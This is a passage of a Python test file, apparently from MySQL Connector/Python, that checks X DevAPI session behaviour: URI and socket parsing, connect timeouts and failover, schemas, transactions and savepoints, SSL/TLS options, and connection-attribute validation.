conn = mysqlx._get_connection_settings("root:@..%2Fpath%2Fto%2Fsock")
self.assertEqual("../path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@..%2Fpath%2Fto%2Fsock"
"/schema")
self.assertEqual("../path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_connection_uri(self):
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
use_pure=False)
session = mysqlx.get_session(uri)
self.assertIsInstance(session, mysqlx.Session)
# Test URI parser function
for uri, res in _URI_TEST_RESULTS:
try:
settings = mysqlx._get_connection_settings(uri)
self.assertEqual(res, settings)
except mysqlx.Error:
self.assertEqual(res, None)
# Test URI parser function
for uri, res in _ROUTER_LIST_RESULTS:
try:
settings = mysqlx._get_connection_settings(uri)
self.assertEqual(res, settings)
except mysqlx.Error:
self.assertEqual(res, None)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 13),
"MySQL 8.0.13+ is required for connect timeout")
def test_connect_timeout(self):
config = self.connect_kwargs.copy()
# 0 ms disables timeouts on socket connections
config["connect-timeout"] = 0
session = mysqlx.get_session(config)
session.close()
# 10000 ms should be time enough to connect
config["connect-timeout"] = 10000
session = mysqlx.get_session(config)
session.close()
# Use connect timeout in URI
session = mysqlx.get_session(build_uri(**config))
session.close()
# Timeout for an unreachable host
# https://en.wikipedia.org/wiki/IPv4#Special-use_addresses
hosts = [
"198.51.100.255",
"192.0.2.255",
"10.255.255.1",
"192.0.2.0",
"203.0.113.255",
"10.255.255.255",
"192.168.255.255",
"203.0.113.4",
"192.168.0.0",
"172.16.0.0",
"10.255.255.251",
"172.31.255.255",
"198.51.100.23",
"172.16.255.255",
"198.51.100.8",
"192.0.2.254",
]
unreach_hosts = []
config["connect-timeout"] = 2000
# Find two unreachable hosts for testing
for host in hosts:
try:
config["host"] = host
mysqlx.get_session(config)
except mysqlx.TimeoutError:
unreach_hosts.append(host)
if len(unreach_hosts) == 2:
break # We just need 2 unreachable hosts
except:
pass
total_unreach_hosts = len(unreach_hosts)
self.assertEqual(total_unreach_hosts, 2,
"Two unreachable hosts are needed, {0} found"
"".format(total_unreach_hosts))
# Multi-host scenarios
# Connect to a secondary host if the primary fails
routers = [
{"host": unreach_hosts[0], "port": config["port"], "priority": 100},
{"host": "127.0.0.1", "port": config["port"], "priority": 90}
]
uri = build_uri(user=config["user"], password=config["password"],
connect_timeout=2000, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Fail to connect to all hosts
routers = [
{"host": unreach_hosts[0], "port": config["port"], "priority": 100},
{"host": unreach_hosts[1], "port": config["port"], "priority": 90}
]
uri = build_uri(user=config["user"], password=config["password"],
connect_timeout=2000, routers=routers)
try:
mysqlx.get_session(uri)
self.fail("It should not connect to any unreachable host")
except mysqlx.TimeoutError as err:
self.assertEqual(err.msg,
"All server connection attempts were aborted. "
"Timeout of 2000 ms was exceeded for each "
"selected server")
except mysqlx.InterfaceError as err:
self.assertEqual(err.msg, "Unable to connect to any of the target hosts")
# Trying to establish a connection with a wrong password should not
# wait for timeout
config["host"] = "127.0.0.1"
config["password"] = "invalid_password"
config["connect-timeout"] = 2000
time_start = time.time()
self.assertRaises(InterfaceError, mysqlx.get_session, config)
time_elapsed = time.time() - time_start
session.close()
if time_elapsed >= config["connect-timeout"] / 1000.0:  # connect-timeout is in ms
self.fail("Trying to establish a connection with a wrong password "
"should not wait for timeout")
# The connect_timeout should be applied only for establishing the
# connection and not for all blocking socket operations
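# For example, SELECT SLEEP(2) below takes longer than the 1000 ms
# connect-timeout, yet it must still succeed once the connection is made.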
config = self.connect_kwargs.copy()
config["connect-timeout"] = 1000
session = mysqlx.get_session(config)
self.assertIsInstance(session, mysqlx.Session)
session.sql("SELECT SLEEP(2)").execute()
session.close()
# The connect_timeout value must be a positive integer
config["connect-timeout"] = -1
self.assertRaises(TypeError, mysqlx.get_session, config)
config["connect-timeout"] = 10.0983
self.assertRaises(TypeError, mysqlx.get_session, config)
config["connect-timeout"] = "abc"
self.assertRaises(TypeError, mysqlx.get_session, config)
def test_get_schemas(self):
schema_name = "test_get_schemas"
self.session.create_schema(schema_name)
schemas = self.session.get_schemas()
self.assertIsInstance(schemas, list)
self.assertTrue(schema_name in schemas)
self.session.drop_schema(schema_name)
def test_get_schema(self):
schema = self.session.get_schema(self.schema_name)
self.assertIsInstance(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(), self.schema_name)
def test_get_default_schema(self):
schema = self.session.get_default_schema()
self.assertIsInstance(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(), self.connect_kwargs["schema"])
self.assertTrue(schema.exists_in_database())
# Test None value is returned if no schema name is specified
settings = self.connect_kwargs.copy()
settings.pop("schema")
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsNone(schema,
"None value was expected but got '{}'".format(schema))
session.close()
# Test SQL statements not fully qualified, which must not raise error:
# mysqlx.errors.OperationalError: No database selected
self.session.sql('CREATE DATABASE my_test_schema').execute()
self.session.sql('CREATE TABLE my_test_schema.pets(name VARCHAR(20))'
).execute()
settings = self.connect_kwargs.copy()
settings["schema"] = "my_test_schema"
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsInstance(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(),
"my_test_schema")
result = session.sql('SHOW TABLES').execute().fetch_all()
self.assertEqual("pets", result[0][0])
self.session.sql('DROP DATABASE my_test_schema').execute()
self.assertFalse(schema.exists_in_database())
self.assertRaises(mysqlx.ProgrammingError, session.get_default_schema)
session.close()
# Test without default schema configured at connect time (passing None)
settings = self.connect_kwargs.copy()
settings["schema"] = None
build_uri(**settings)
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsNone(schema,
"None value was expected but got '{}'".format(schema))
session.close()
# Test that a nonexistent default schema at get_session raises an error
settings = self.connect_kwargs.copy()
settings["schema"] = "nonexistent"
self.assertRaises(InterfaceError, mysqlx.get_session, settings)
# Test BUG#28942938: 'ACCESS DENIED' error when an unauthorized user tries
# to use a default schema that does not exist at get_session
self.session.sql("DROP USER IF EXISTS 'def_schema'@'%'").execute()
self.session.sql("CREATE USER 'def_schema'@'%' IDENTIFIED WITH "
"mysql_native_password BY 'test'").execute()
settings = self.connect_kwargs.copy()
settings['user'] = 'def_schema'
settings['password'] = 'test'
settings["schema"] = "nonexistent"
# a) Test with no Granted privileges
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Access denied for this user
self.assertEqual(1044, context.exception.errno)
# b) Grant privileges on the requested (still nonexistent) schema
self.session.sql("GRANT ALL PRIVILEGES ON nonexistent.* TO "
"'def_schema'@'%'").execute()
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Schema does not exist
self.assertNotEqual(1044, context.exception.errno)
def test_drop_schema(self):
test_schema = 'mysql_session_test_drop_schema'
schema = self.session.create_schema(test_schema)
self.session.drop_schema(test_schema)
self.assertFalse(schema.exists_in_database())
def test_create_schema(self):
schema = self.session.create_schema(self.schema_name)
self.assertTrue(schema.exists_in_database())
def test_sql(self):
statement = self.session.sql("SELECT VERSION()")
self.assertTrue(isinstance(statement, mysqlx.Statement))
# SQL statements should be strings
statement = self.session.sql(123)
self.assertRaises(mysqlx.ProgrammingError, statement.execute)
# Test unicode statements
statement = self.session.sql(u"SELECT VERSION()").execute()
self.assertTrue(isinstance(statement, mysqlx.SqlResult))
def test_rollback(self):
table_name = "t2"
schema = self.session.get_schema(self.schema_name)
if not schema.exists_in_database():
self.session.create_schema(self.schema_name)
stmt = "CREATE TABLE {0}.{1}(_id INT)"
self.session.sql(stmt.format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
self.session.start_transaction()
table.insert("_id").values(1).execute()
self.assertEqual(table.count(), 1)
self.session.rollback()
self.assertEqual(table.count(), 0)
drop_table(schema, table_name)
def test_commit(self):
table_name = "t2"
schema = self.session.get_schema(self.schema_name)
if not schema.exists_in_database():
self.session.create_schema(self.schema_name)
stmt = "CREATE TABLE {0}.{1}(_id INT)"
self.session.sql(stmt.format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
self.session.start_transaction()
table.insert("_id").values(1).execute()
self.assertEqual(table.count(), 1)
self.session.commit()
self.assertEqual(table.count(), 1)
drop_table(schema, table_name)
def test_savepoint(self):
collection_name = "collection_test"
schema = self.session.get_schema(self.schema_name)
# The savepoint name should be a valid string
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, 123)
# The savepoint name should not be an empty string
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, "")
# The savepoint name should not be a white space
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, " ")
# Invalid rollback savepoint without a started transaction
sp1 = self.session.set_savepoint("sp1")
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp1)
collection = schema.create_collection(collection_name)
self.session.start_transaction()
collection.add({"_id": "1", "name": "Fred", "age": 21}).execute()
self.assertEqual(1, collection.count())
# Create a savepoint named 'sp2'
sp2 = self.session.set_savepoint("sp2")
self.assertEqual(sp2, "sp2")
collection.add({"_id": "2", "name": "Wilma", "age": 33}).execute()
self.assertEqual(2, collection.count())
# Create a savepoint named 'sp3'
sp3 = self.session.set_savepoint("sp3")
collection.add({"_id": "3", "name": "Betty", "age": 67}).execute()
self.assertEqual(3, collection.count())
# Rollback to 'sp3' savepoint
self.session.rollback_to(sp3)
self.assertEqual(2, collection.count())
# Rollback to 'sp2' savepoint
self.session.rollback_to(sp2)
self.assertEqual(1, collection.count())
# The 'sp3' savepoint should not exist at this point
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp3)
collection.add({"_id": "4", "name": "Barney", "age": 42}).execute()
self.assertEqual(2, collection.count())
# Create an unnamed savepoint
sp4 = self.session.set_savepoint()
collection.add({"_id": "3", "name": "Wilma", "age": 33}).execute()
self.assertEqual(3, collection.count())
# Release unnamed savepoint
self.session.release_savepoint(sp4)
self.assertEqual(3, collection.count())
# The 'sp4' savepoint should not exist at this point
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp4)
self.session.commit()
schema.drop_collection(collection_name)
def test_close(self):
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
session.close()
self.assertRaises(mysqlx.OperationalError, schema.exists_in_database)
@unittest.skipIf(sys.version_info < (2, 7, 9), "The support for SSL is "
"not available for Python versions < 2.7.9.")
def test_ssl_connection(self):
config = {}
config.update(self.connect_kwargs)
socket = config.pop("socket")
# Secure by default
session = mysqlx.get_session(config)
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_version'").execute().fetch_all()
self.assertTrue("TLS" in res[0][1])
session.close()
# Error on setting Client key without Client Certificate
config["ssl-key"] = tests.SSL_KEY
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on settings CRL without setting CA Certificate
config["ssl-crl"] = "/dummy/path"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config.pop("ssl-crl")
# Error on setting SSL Mode to disabled with any SSL option
config["ssl-mode"] = "disabled"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on setting SSL Mode to verify_* without ssl_ca
config["ssl-mode"] = "verify_ca"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config["ssl-mode"] = "verify_identity"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on SSL Mode set to required with CA set
config["ssl-ca"] = tests.SSL_CA
config["ssl-cert"] = tests.SSL_CERT
config["ssl-mode"] = "required"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Connection with ssl parameters
# Setting an invalid host name against a server certificate
config["host"] = "127.0.0.1"
# Should connect with ssl-mode=verify_ca (host name is not verified)
config["ssl-mode"] = "verify_ca"
session = mysqlx.get_session(config)
res = session.sql(
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
# Should fail to connect with verify_identity
config["ssl-mode"] = "verify_identity"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Should connect with verify_identity and the correct host name
config["host"] = "localhost"
config["ssl-mode"] = "verify_identity"
session = mysqlx.get_session(config)
res = session.sql(
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
res = session.sql(
"SHOW STATUS LIKE 'Mysqlx_ssl_version'").execute().fetch_all()
self.assertTrue("TLS" in res[0][1])
session.close()
# Error if ssl-mode=disabled and ssl_* set
extra = [("ssl_mode", "disabled"),
("ssl_ca", "({0})".format(tests.SSL_CA))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Error if invalid ssl-mode
extra = [("ssl_mode", "invalid")]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Parsing SSL Certificates
extra = [("ssl_mode", "verify_ca"),
("ssl_ca", file_uri(tests.SSL_CA, False)),
("ssl_key", file_uri(tests.SSL_KEY, False)),
("ssl_cert", file_uri(tests.SSL_CERT, False))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
session = mysqlx.get_session(uri)
extra = [("ssl_mode", "verify_ca"),
("ssl_ca", file_uri(tests.SSL_CA)),
("ssl_key", file_uri(tests.SSL_KEY)),
("ssl_cert", file_uri(tests.SSL_CERT))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
session = mysqlx.get_session(uri)
@unittest.skipIf(sys.version_info < (2, 7, 9), "The support for SSL is "
"not available for Python versions < 2.7.9.")
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 40), "TLSv1.1 incompatible")
def test_get_session_with_tls_version(self):
# Use a copy of the connection settings without schema and socket
settings = self.connect_kwargs.copy()
settings.pop("schema")
settings.pop("socket")
# Dictionary connection settings tests using dict settings
# Empty tls_version list
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = []
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
self.assertTrue(("At least one" in context.exception.msg), "Unexpected "
"exception message found: {}"
"".format(context.exception.msg))
# Empty tls_ciphersuites list using dict settings
settings["tls-ciphersuites"] = []
settings["tls-versions"] = ["TLSv1"]
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
self.assertTrue(("No valid cipher suite" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Given tls-version not in ["TLSv1.1", "TLSv1.2", "TLSv1.3"]
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv0.2", "TLSv1.7", "TLSv10.2"]
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Repeated values in tls-versions on dict settings
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.2", "TLSv1.1", "TLSv1.2"]
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Empty tls-versions on dict settings
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = []
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
self.assertTrue(("At least one TLS" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Verify the unknown cipher suite case
settings["tls-ciphersuites"] = ["NOT-KNOWN"]
settings["tls-versions"] = ["TLSv1.2"]
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# URI string connection settings tests
# Empty tls_version list on URI
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = []
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("At least one" in context.exception.msg), "Unexpected "
"exception message found: {}"
"".format(context.exception.msg))
# Empty tls_ciphersuites list without tls-versions
settings["tls-ciphersuites"] = []
settings.pop("tls-versions")
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("No valid cipher suite" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Invalid cipher in tls_ciphersuites list without tls-versions
settings["tls-ciphersuites"] = ["INVALID"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("value 'INVALID' in cipher" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
settings["tls-ciphersuites"] = "INVALID"
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("No valid cipher suite" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Invalid value on tls_version list on URI
settings.pop("tls-ciphersuites")
settings["tls-versions"] = "INVALID"
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("tls-version: 'INVALID' is" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Empty tls_ciphersuites list
settings["tls-ciphersuites"] = []
settings["tls-versions"] = ["TLSv1"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("No valid cipher suite" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Given tls-version not in ["TLSv1.1", "TLSv1.2", "TLSv1.3"]
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv0.2", "TLSv1.7", "TLSv10.2"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
# Empty tls-versions list
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = []
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("At least one TLS" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Repeated values in tls-versions on URI
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.2", "TLSv1.1", "TLSv1.2"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
# Repeated tls-versions on URI
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.2", "TLSv1.3"]
uri_settings = build_uri(**settings)
uri_settings = "{}&{}".format(uri_settings,
"tls-versions=[TLSv1.1,TLSv1.2]")
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("Duplicate option" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Verify InterfaceError exception is raised With invalid TLS version
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv8"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("not recognized" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Verify the unknown cipher suite case
settings["tls-ciphersuites"] = ["NOT-KNOWN"]
settings["tls-versions"] = ["TLSv1.2"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
# Verify that TLSv1.3 is accepted in tls-versions (the connection succeeds)
# even if TLSv1.3 itself is not supported locally.
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.3", "TLSv1.2"]
uri_settings = build_uri(**settings)
# Connection must succeed because another TLS version is included
_ = mysqlx.get_session(uri_settings)
supported_tls = check_tls_versions_support(
["TLSv1.2", "TLSv1.1", "TLSv1"])
if not supported_tls:
self.fail("No TLS version to test: {}".format(supported_tls))
if len(supported_tls) > 1:
# Verify given TLS version is used
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
for tes_ver in supported_tls:
settings["tls-versions"] = [tes_ver]
uri_settings = build_uri(**settings)
session = mysqlx.get_session(uri_settings)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_version%'"
).execute().fetch_all()
for row in status:
if row.get_string("Variable_name") == 'Mysqlx_ssl_version':
self.assertEqual(row.get_string("Value"), tes_ver,
"Unexpected TLS version found: {} for: {}"
"".format(row.get_string("Value"),
tes_ver))
# The following tests require TLSv1.2 and MySQL 8.0.17+
if tests.MYSQL_VERSION < (8, 0, 17):
return
if "TLSv1.1" in supported_tls:
# Verify the newest TLS version is used from the given list
exp_res = ["TLSv1.2", "TLSv1.1", "TLSv1.2"]
test_vers = [["TLSv1", "TLSv1.2", "TLSv1.1"], ["TLSv1", "TLSv1.1"],
["TLSv1.2", "TLSv1"]]
for tes_ver, exp_ver in zip(test_vers, exp_res):
settings["tls-versions"] = tes_ver
uri_settings = build_uri(**settings)
session = mysqlx.get_session(uri_settings)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_version%'"
).execute().fetch_all()
for row in status:
if row.get_string('Variable_name') == 'Mysqlx_ssl_version':
self.assertEqual(row.get_string('Value'), exp_ver,
"Unexpected TLS version found: {}"
"".format(row.get_string('Value')))
# Verify given TLS cipher suite is used
exp_res = ["DHE-RSA-AES256-SHA256", "DHE-RSA-AES256-SHA256",
"DHE-RSA-AES128-GCM-SHA256"]
test_ciphers = [["TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"],
["DHE-RSA-AES256-SHA256"],
["TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"]]
settings["tls-versions"] = "TLSv1.2"
for test_cipher, exp_ver in zip(test_ciphers, exp_res):
settings["tls-ciphersuites"] = test_cipher
uri_settings = build_uri(**settings)
session = mysqlx.get_session(uri_settings)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_cipher%'"
).execute().fetch_all()
for row in status:
if row.get_string("Variable_name") == "Mysqlx_ssl_cipher":
self.assertEqual(row.get_string("Value"), exp_ver,
"Unexpected TLS version found: {} for: {}"
"".format(row.get_string("Value"),
test_cipher))
# Verify one of the TLS cipher suites from the given list is used
exp_res = ["DHE-RSA-AES256-SHA256", "DHE-RSA-AES256-SHA256",
"DHE-RSA-AES128-GCM-SHA256"]
test_ciphers = ["TLS_DHE_RSA_WITH_AES_256_CBC_SHA256",
"DHE-RSA-AES256-SHA256",
"TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"]
settings["tls-ciphersuites"] = test_ciphers
settings["tls-versions"] = "TLSv1.2"
uri_settings = build_uri(**settings)
session = mysqlx.get_session(uri_settings)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_cipher%'"
).execute().fetch_all()
for row in status:
if row.get_string("Variable_name") == "Mysqlx_ssl_cipher":
self.assertIn(row.get_string("Value"), exp_res,
"Unexpected TLS version found: {} not in {}"
"".format(row.get_string('Value'), exp_res))
if "TLSv1.1" in supported_tls:
# Verify behavior when "TLSv1.3" is not supported.
if TLS_V1_3_SUPPORTED:
exp_tls_ver = "TLSv1.3"
else:
exp_tls_ver = "TLSv1.2"
# Connection succeeds with the secondary TLS version given.
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.3", "TLSv1.2"]
settings_n = 0
for settings_case in [settings, build_uri(**settings)]:
settings_n += 1
session = mysqlx.get_session(settings_case)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_version%'"
).execute().fetch_all()
for row in status:
if row.get_string('Variable_name') == 'Mysqlx_ssl_version':
self.assertEqual(row.get_string('Value'), exp_tls_ver,
"Unexpected TLS version {} while using settings#{}"
": {}".format(row.get_string('Value'),
settings_n, settings_case))
# Verify error when TLSv1.3 is not supported.
if not TLS_V1_3_SUPPORTED:
settings["tls-versions"] = ["TLSv1.3"]
for settings_case in [settings, build_uri(**settings)]:
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings_case)
def test_disabled_x_protocol(self):
session = mysqlx.get_session(self.connect_kwargs)
res = session.sql("SHOW VARIABLES WHERE Variable_name = 'port'") \
.execute().fetch_all()
settings = self.connect_kwargs.copy()
settings["port"] = res[0][1] # Lets use the MySQL classic port
session.close()
self.assertRaises(ProgrammingError, mysqlx.get_session, settings)
@unittest.skipIf(not HAVE_MYSQLXPB_CEXT, "C Extension not available")
@unittest.skipUnless(HAVE_PROTOBUF, "Protobuf not available")
def test_use_pure(self):
settings = self.connect_kwargs.copy()
settings["use-pure"] = False
session = mysqlx.get_session(settings)
self.assertFalse(session.use_pure)
self.assertEqual(Protobuf.mysqlxpb.__name__, "_mysqlxpb")
session.use_pure = True
self.assertTrue(session.use_pure)
self.assertEqual(Protobuf.mysqlxpb.__name__, "_mysqlxpb_pure")
# 'use_pure' should be a bool type
self.assertRaises(ProgrammingError, setattr, session, "use_pure", -1)
session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 16), "XPlugin not compatible")
def test_connection_attributes(self):
# Validate an error is raised if URL user defined connection attributes
# given in a list are invalid
invalid_conn_attrs = [2, 1.2, "[_='13']", '[_="1"]', '[_=23]', "[_2.3]",
"[_invalid]", "[valid=0,_]", "[valid=0,_nvalid]",
"[_invalid,valid=0]"]
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"])
for invalid_attr in invalid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, invalid_attr)
with self.assertRaises(InterfaceError) as _:
mysqlx.get_session(uri_test)
LOGGER.error("InterfaceError not raised while testing "
"invalid attribute: {}".format(invalid_attr))
# Validate an error is raised if URL user defined connection attributes
# are not a list or a bool type
invalid_conn_attrs = ["[incompleteL", "incompleteL]", "A", "invalid",
"_invalid", "2", "2.3", "{}", "{invalid=0}",
"{[invalid=0]}", "_", 2, 0.2]
for invalid_attr in invalid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, invalid_attr)
with self.assertRaises(InterfaceError) as _:
mysqlx.get_session(uri_test)
LOGGER.error("InterfaceError not raised while testing "
"invalid attribute: {}".format(invalid_attr))
# Validate an error is raised if URL user defined connection attributes
# through a connection URL when a name is duplicated
connection_attributes = {
"foo": "bar",
"repeated": "attribute",
"baz": "zoom",
}
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes=connection_attributes)
uri = "{},repeated=duplicate_attribute]".format(uri[0:-1])
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(uri)
LOGGER.error("InterfaceError not raised while testing "
"uri: {}".format(uri))
self.assertTrue("Duplicate key 'repeated' used in "
"connection-attributes" in context.exception.msg)
# Test error is raised for attribute name starting with '_'
connection_attributes = [
{"foo": "bar", "_baz": "zoom"},
{"_baz": "zoom"},
{"foo": "bar", "_baz": "zoom", "puuuuum": "kaplot"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connect_kwargs: {}".format(connect_kwargs))
self.assertTrue("connection-attributes" in
context.exception.msg)
self.assertTrue("cannot start with '_'" in context.exception.msg)
# Test error is raised for attribute name size exceeds 32 characters
connection_attributes = [
{"foo": "bar", "p{}w".format("o"*31): "kaplot"},
{"p{}w".format("o"*31): "kaplot"},
{"baz": "zoom", "p{}w".format("o"*31): "kaplot", "a": "b"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
self.assertTrue("exceeds 32 characters limit size" in
context.exception.msg)
# Test error is raised for attribute value size exceeds 1024 characters
connection_attributes = [
{"foo": "bar", "pum": "kr{}nk".format("u"*1024)},
{"pum": "kr{}nk".format("u"*1024)},
{"baz": "zoom", "pum": "kr{}nk".format("u"*1024), "a": "b"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection-attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
self.assertTrue("exceeds 1024 characters limit size" in
context.exception.msg)
# Test valid generic values for the connection-attributes on URI
valid_conn_attrs = ["[]", "False", "True", "false", "true", "[valid]",
"[valid=0]", "[valid,valid2=0]", '["_valid=0]',
"[valid2='0']", "[valid=,valid2=0]", "['_valid=0]",
"[[_valid=0]]"]
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"])
for valid_attr in valid_conn_attrs:
